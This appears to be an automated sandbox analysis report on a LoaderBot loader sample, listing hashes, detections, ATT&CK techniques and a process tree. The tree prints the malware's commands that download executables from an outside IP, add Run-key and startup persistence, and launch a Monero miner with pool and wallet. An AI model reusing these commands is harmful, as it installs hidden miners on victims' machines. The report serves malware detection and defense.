loaderbot | e7587776adecf859e137e7af3da4b9b6fd9428e6f89cc48d3a63886d490baaca

Analysis

max time kernel
151s
max time network
129s
platform
windows10_x64
resource
win10-en-20211208
submitted
14-01-2022 12:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

feb8add569247306cb0271c907607238.exe
Size

348KB
MD5

feb8add569247306cb0271c907607238
SHA1

bb9353d602a82ff174afe7574f4afd6009e2a8b0
SHA256

e7587776adecf859e137e7af3da4b9b6fd9428e6f89cc48d3a63886d490baaca
SHA512

6f650a1d44a11b2205e59dc915e244ac43988c7ac32972280cc5c5ca1ed668b683c2b06f61aef8d2e91ce1c83fc4e0788207023b6ca81372acdb4935f0402689

Score

10^/10

loaderbot loader miner persistence upx

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot

LoaderBot executable 4 IoCs

resource	yara_rule
behavioral2/memory/4432-136-0x0000000001310000-0x0000000001756000-memory.dmp	loaderbot
behavioral2/memory/4432-137-0x0000000001310000-0x0000000001756000-memory.dmp	loaderbot
behavioral2/memory/4432-142-0x0000000001310000-0x0000000001756000-memory.dmp	loaderbot
behavioral2/memory/4432-143-0x0000000001310000-0x0000000001756000-memory.dmp	loaderbot

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	3456	WScript.exe

Downloads MZ/PE file

Executes dropped EXE 7 IoCs

pid	Process
4104	extd.exe
1984	extd.exe
3140	setup_c.exe
4252	extd.exe
4432	setup_m.exe
4420	extd.exe
1396	Driver.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000500000001ab28-118.dat	upx
behavioral2/files/0x000500000001ab28-119.dat	upx
behavioral2/files/0x000500000001ab28-124.dat	upx
behavioral2/files/0x000500000001ab28-129.dat	upx
behavioral2/files/0x000500000001ab28-135.dat	upx

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	setup_m.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup_m.exe"	setup_m.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4432	setup_m.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4324	3140	WerFault.exe	73

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings	cmd.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4432	setup_m.exe
4432	setup_m.exe
4324	WerFault.exe
4324	WerFault.exe
4324	WerFault.exe
4324	WerFault.exe
4324	WerFault.exe
4324	WerFault.exe
4324	WerFault.exe
4324	WerFault.exe
4324	WerFault.exe
4324	WerFault.exe
4324	WerFault.exe
4324	WerFault.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe
4432	setup_m.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
644	Process not Found

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeRestorePrivilege	4324	WerFault.exe
Token: SeBackupPrivilege	4324	WerFault.exe
Token: SeDebugPrivilege	4324	WerFault.exe
Token: SeDebugPrivilege	4432	setup_m.exe
Token: SeLockMemoryPrivilege	1396	Driver.exe
Token: SeLockMemoryPrivilege	1396	Driver.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3620 wrote to memory of 4156	3620	feb8add569247306cb0271c907607238.exe	69
PID 3620 wrote to memory of 4156	3620	feb8add569247306cb0271c907607238.exe	69
PID 4156 wrote to memory of 4104	4156	cmd.exe	70
PID 4156 wrote to memory of 4104	4156	cmd.exe	70
PID 4156 wrote to memory of 4104	4156	cmd.exe	70
PID 4156 wrote to memory of 3456	4156	cmd.exe	71
PID 4156 wrote to memory of 3456	4156	cmd.exe	71
PID 4156 wrote to memory of 1984	4156	cmd.exe	72
PID 4156 wrote to memory of 1984	4156	cmd.exe	72
PID 4156 wrote to memory of 1984	4156	cmd.exe	72
PID 4156 wrote to memory of 3140	4156	cmd.exe	73
PID 4156 wrote to memory of 3140	4156	cmd.exe	73
PID 4156 wrote to memory of 3140	4156	cmd.exe	73
PID 4156 wrote to memory of 4252	4156	cmd.exe	74
PID 4156 wrote to memory of 4252	4156	cmd.exe	74
PID 4156 wrote to memory of 4252	4156	cmd.exe	74
PID 4156 wrote to memory of 4432	4156	cmd.exe	77
PID 4156 wrote to memory of 4432	4156	cmd.exe	77
PID 4156 wrote to memory of 4432	4156	cmd.exe	77
PID 4156 wrote to memory of 4420	4156	cmd.exe	78
PID 4156 wrote to memory of 4420	4156	cmd.exe	78
PID 4156 wrote to memory of 4420	4156	cmd.exe	78
PID 4432 wrote to memory of 1396	4432	setup_m.exe	79
PID 4432 wrote to memory of 1396	4432	setup_m.exe	79

C:\Users\Admin\AppData\Local\Temp\feb8add569247306cb0271c907607238.exe
"C:\Users\Admin\AppData\Local\Temp\feb8add569247306cb0271c907607238.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3620
- C:\Windows\System32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A384.tmp\A385.tmp\A386.bat C:\Users\Admin\AppData\Local\Temp\feb8add569247306cb0271c907607238.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4156
- - C:\Users\Admin\AppData\Local\Temp\A384.tmp\A385.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\A384.tmp\A385.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:4104
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30471\360t.vbs"
    3⤵
    - Blocklisted process makes network request
    PID:3456
- - C:\Users\Admin\AppData\Local\Temp\A384.tmp\A385.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\A384.tmp\A385.tmp\extd.exe "/download" "http://81.163.30.181/1.exe" "setup_c.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:1984
- - C:\Users\Admin\AppData\Local\Temp\30471\setup_c.exe
    setup_c.exe
    3⤵
    - Executes dropped EXE
    PID:3140
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 412
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4324
- - C:\Users\Admin\AppData\Local\Temp\A384.tmp\A385.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\A384.tmp\A385.tmp\extd.exe "/download" "http://81.163.30.181/2.exe" "setup_m.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:4252
- - C:\Users\Admin\AppData\Local\Temp\30471\setup_m.exe
    setup_m.exe
    3⤵
    - Executes dropped EXE
    - Drops startup file
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1396
- - C:\Users\Admin\AppData\Local\Temp\A384.tmp\A385.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\A384.tmp\A385.tmp\extd.exe "" "" "" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    PID:4420

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1396-154-0x0000000001F70000-0x0000000001F90000-memory.dmp

Filesize
128KB

Download
memory/1396-153-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/1396-152-0x00000000001B0000-0x00000000001C4000-memory.dmp

Filesize
80KB

Download
memory/3140-130-0x0000000000920000-0x0000000000980000-memory.dmp

Filesize
384KB

Download
memory/4432-142-0x0000000001310000-0x0000000001756000-memory.dmp

Filesize
4.3MB

Download
memory/4432-143-0x0000000001310000-0x0000000001756000-memory.dmp

Filesize
4.3MB

Download
memory/4432-144-0x00000000741B0000-0x0000000074230000-memory.dmp

Filesize
512KB

Download
memory/4432-145-0x0000000076980000-0x0000000076F04000-memory.dmp

Filesize
5.5MB

Download
memory/4432-146-0x0000000074C00000-0x0000000075F48000-memory.dmp

Filesize
19.3MB

Download
memory/4432-147-0x0000000005740000-0x00000000057A6000-memory.dmp

Filesize
408KB

Download
memory/4432-148-0x0000000005550000-0x0000000005551000-memory.dmp

Filesize
4KB

Download
memory/4432-141-0x0000000077550000-0x0000000077641000-memory.dmp

Filesize
964KB

Download
memory/4432-140-0x00000000767B0000-0x0000000076972000-memory.dmp

Filesize
1.8MB

Download
memory/4432-139-0x0000000001060000-0x00000000010A5000-memory.dmp

Filesize
276KB

Download
memory/4432-138-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/4432-137-0x0000000001310000-0x0000000001756000-memory.dmp

Filesize
4.3MB

Download
memory/4432-136-0x0000000001310000-0x0000000001756000-memory.dmp

Filesize
4.3MB

Download